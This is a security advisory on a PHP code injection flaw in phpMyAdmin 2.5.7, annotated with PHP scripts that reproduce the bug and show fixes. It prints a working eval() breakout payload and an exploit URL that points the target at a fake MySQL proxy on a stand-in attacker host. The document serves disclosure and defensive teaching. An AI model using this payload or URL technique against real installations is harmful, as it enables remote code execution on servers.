PHP code injection in phpMyAdmin 2.5.7

Software       : phpMyAdmin
Version        : 2.5.7
Vendor         : http://www.phpmyadmin.net/
Vulnerability  : PHP code injection (only if $cfg['LeftFrameLight'] is set to FALSE)
Problem-Type   : remote user

phpMyAdmin is a web-based MySQL administration tool written in PHP.

There is a vulnerability in phpMyAdmin version 2.5.7.
It allows a remote user to inject PHP code that is then executed by
the eval() call in left.php.
However, the vulnerability is only exploitable if the variable
$cfg['LeftFrameLight'] is set to FALSE (in config.inc.php).

1. Bugs

1.a. Ability to grow array variables through GET parameters
phpMyAdmin keeps its multiple-server configuration in array variables
($cfg['Servers'][$i]). They are coded in config.inc.php and are usually
set at installation time by the site owner. Each entry holds the information
phpMyAdmin needs for one MySQL server: host, port, user, password,
authentication type, database name and so on. The default configuration
provides up to three server entries.

However, $cfg['Servers'][$i] is never initialised before request variables
reach the global scope, so a remote user can add a server entry of their own
to the list by extending the $cfg['Servers'][$i] array through nested GET
parameters.

A remote user could add a server configuration like this:
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=202.81.x.x&cfg[Servers][4][port]=8888&cfg[Servers][4][user]=alice ... and so forth.
The running script will then use the fourth server configuration, which the
remote user supplied, and connect to whatever host it names.
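The following PHP script is an added illustration, not phpMyAdmin's own code and not part of the original advisory. It reproduces the mechanism: request variables are imported into the global scope before the configuration file fills in servers 1 to 3, so a server index the configuration never touches survives. The load_config_unsafe() stand-in for config.inc.php and its host names are assumptions; the $_GET array is constructed to match the URL above. The hardened variant resets $cfg before loading the configuration and rejects any server number the administrator did not configure.

```php
<?php
// Added example (not phpMyAdmin code): how an uninitialised $cfg['Servers']
// array can be extended from the query string, and how to prevent it.
// Run with: php cfg_injection.php

// Constructed request, equivalent to
//   left.php?server=4&cfg[Servers][4][host]=202.81.x.x&cfg[Servers][4][user]=alice
// PHP parses bracketed parameter names into nested arrays automatically.
$_GET = array(
    'server' => '4',
    'cfg'    => array('Servers' => array(4 => array(
        'host' => '202.81.x.x',
        'port' => '8888',
        'user' => 'alice',
    ))),
);

// Stand-in for the site's config.inc.php (assumed): three servers, as in
// the default phpMyAdmin configuration. Note that it never resets $cfg.
function load_config_unsafe(array &$cfg)
{
    $i = 0;
    for ($n = 1; $n <= 3; $n++) {
        $i++;
        $cfg['Servers'][$i]['host']      = "db$n.example.internal"; // hypothetical hosts
        $cfg['Servers'][$i]['user']      = 'pma';
        $cfg['Servers'][$i]['auth_type'] = 'cookie';
    }
}

// Vulnerable flow: request variables land in the variable scope *before*
// the configuration is loaded, and the configuration only adds entries 1..3
// to whatever is already there. Entry 4 comes from the attacker.
function select_server_unsafe()
{
    extract($_GET);            // creates $cfg['Servers'][4] and $server
    load_config_unsafe($cfg);  // appends servers 1..3, leaves 4 untouched
    return $cfg['Servers'][$server];
}

// Hardened flow: start from an empty configuration, load it, then accept
// only a server number that the administrator actually configured.
function select_server_safe()
{
    $cfg = array('Servers' => array());
    load_config_unsafe($cfg);
    $server = isset($_GET['server']) ? (int) $_GET['server'] : 1;
    if (!isset($cfg['Servers'][$server])) {
        return null;           // unknown server: refuse instead of trusting the request
    }
    return $cfg['Servers'][$server];
}

$unsafe = select_server_unsafe();
$safe   = select_server_safe();
echo "unsafe: ", isset($unsafe['host']) ? $unsafe['host'] : '(none)', "\n"; // attacker's 202.81.x.x
echo "safe:   ", $safe === null ? 'rejected' : $safe['host'], "\n";          // rejected
```

The important detail is the order of operations in select_server_unsafe(): the request is merged first and the configuration second, so the configuration can only overwrite the indices it knows about. Resetting $cfg['Servers'] before including config.inc.php and validating $server against the loaded entries closes both halves of the problem.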

1.b. Escaping the 'magic' quote (') - oops
If the variable $cfg['LeftFrameLight'] is set to FALSE, this piece of code is executed:

$eval_string = '$tablestack[\'' . implode('\'][\'', $_table) . '\'][\'pma_name\'][] = \'' . str_replace('\'', '\\\'', $table) . '\';';
eval($eval_string);

$eval_string holds PHP code that is then executed by the eval() function.
If we have one table named 'mytable', $eval_string will have the string value
$tablestack['']['pma_name'][] = 'mytable';

phpMyAdmin handles the escaping of the single quote improperly: str_replace()
turns ' into \' but never escapes the backslash itself. A backslash placed
in front of the quote therefore comes out as \\' which, inside a single-quoted
PHP literal, is an escaped backslash followed by a live quote that terminates
the string. So with a crafted table name containing meta-characters like this
		 \';exec("touch /tmp/touchable");/*
(the proxy source, being C, writes it as \\';exec(\"touch /tmp/touchable\");/*)
$eval_string will have the value
$tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';

To PHP this is three pieces: an assignment of the one-character string \,
the attacker's exec() call, and an opening /* comment that swallows the
trailing '; so that the dangling quote cannot cause a parse error. The
unterminated comment left at the end only produces a warning message in PHP.
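The following PHP script is an added example, not code from phpMyAdmin or from the original advisory. It rebuilds the eval() string with the same str_replace() escaping as left.php, shows why the payload above breaks out of the string literal, and contrasts two fixes: escaping the backslash before the quote, and dropping eval() altogether in favour of a by-reference array walk. The function names (build_eval_string_unsafe(), escape_single_quoted(), add_table()) are mine; the $path value array('') reproduces the single-table case of the advisory, and the harmless payload used for the live eval() is constructed for the demonstration.

```php
<?php
// Added example (not phpMyAdmin code): the eval() string from left.php
// rebuilt as a function, the escaping bug that lets a table name break
// out of it, and a replacement that needs no eval() at all.
// Run with: php eval_injection.php

// Same construction as left.php: only the single quote is escaped, the
// backslash is not (and the $_table path parts are not escaped at all).
function build_eval_string_unsafe(array $path, $table)
{
    return '$tablestack[\'' . implode('\'][\'', $path) . '\'][\'pma_name\'][] = \''
         . str_replace('\'', '\\\'', $table) . '\';';
}

// Correct escaping for a single-quoted PHP literal: double the backslash
// first, then escape the quote, so a backslash in the input can never
// neutralise the escape we add.
function escape_single_quoted($s)
{
    return str_replace(array('\\', '\''), array('\\\\', '\\\''), $s);
}

function build_eval_string_fixed(array $path, $table)
{
    $parts = array_map('escape_single_quoted', $path);
    return '$tablestack[\'' . implode('\'][\'', $parts) . '\'][\'pma_name\'][] = \''
         . escape_single_quoted($table) . '\';';
}

// Better still: no eval(). Walk the array by reference and append.
function add_table(array &$tablestack, array $path, $table)
{
    $node = &$tablestack;
    foreach ($path as $key) {
        if (!isset($node[$key]) || !is_array($node[$key])) {
            $node[$key] = array();
        }
        $node = &$node[$key];
    }
    $node['pma_name'][] = $table;
}

$path = array('');            // what the advisory's single 'mytable' case produces

// 1. Normal table name: the string is what the advisory shows.
echo build_eval_string_unsafe($path, 'mytable'), "\n";
// $tablestack['']['pma_name'][] = 'mytable';

// 2. The advisory's payload as raw bytes: \';exec("touch /tmp/touchable");/*
$payload = '\\\';exec("touch /tmp/touchable");/*';
echo build_eval_string_unsafe($path, $payload), "\n";
// $tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';
// str_replace turned \' into \\' : an escaped backslash followed by a live
// quote, so the literal ends after one backslash and exec() is code.
echo build_eval_string_fixed($path, $payload), "\n";
// $tablestack['']['pma_name'][] = '\\\';exec("touch /tmp/touchable");/*';
// The backslash is doubled first, the quote stays escaped, and the whole
// payload is an ordinary string.

// 3. Prove it with a harmless constructed payload that eval() can run on any
//    PHP version (a // comment instead of the unterminated /* above).
$tablestack = array();
$injected   = false;
eval(build_eval_string_unsafe($path, '\\\';$injected = true;//'));
var_dump($injected);                       // bool(true): attacker code ran

$tablestack = array();
$injected   = false;
eval(build_eval_string_fixed($path, '\\\';$injected = true;//'));
var_dump($injected);                       // bool(false)
var_dump($tablestack['']['pma_name'][0]);  // the payload, stored as plain text

// 4. The eval-free version handles any name, including the real payload.
$tablestack = array();
add_table($tablestack, $path, $payload);
var_dump($tablestack['']['pma_name'][0] === $payload);  // bool(true)
```

The order inside escape_single_quoted() matters: if the quote were escaped before the backslash, the backslash added for the quote would itself be doubled and the escape would be undone again. The add_table() variant sidesteps the question entirely, which is the fix a reviewer should ask for whenever eval() is only being used to reach a dynamic array path.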
	 
	
2. Exploit
Since MySQL does not allow a table name to contain such meta-characters, we
have to provide a wrapper around a MySQL server that acts as a proxy, except
that when the client queries "SHOW TABLES" it sends back a fake table name,
replacing the real table name with a string containing the exploit code.

http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers][4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&cfg[Servers][4][only_db]=databasename

On attacker.host.com the MySQL wrapper listens on port 8889, waiting for the
connection. With auth_type=config and the user and password supplied in the
URL, phpMyAdmin connects to the wrapper directly, without any login prompt.

3. Proof of Concept
The MySQL wrapper, written in C, can be found in the attachment
or at http://eagle.kecapi.com/sec/codes/phpmy-expt.c

4. Purpose
This full disclosure is intended for educational purposes. Nothing else.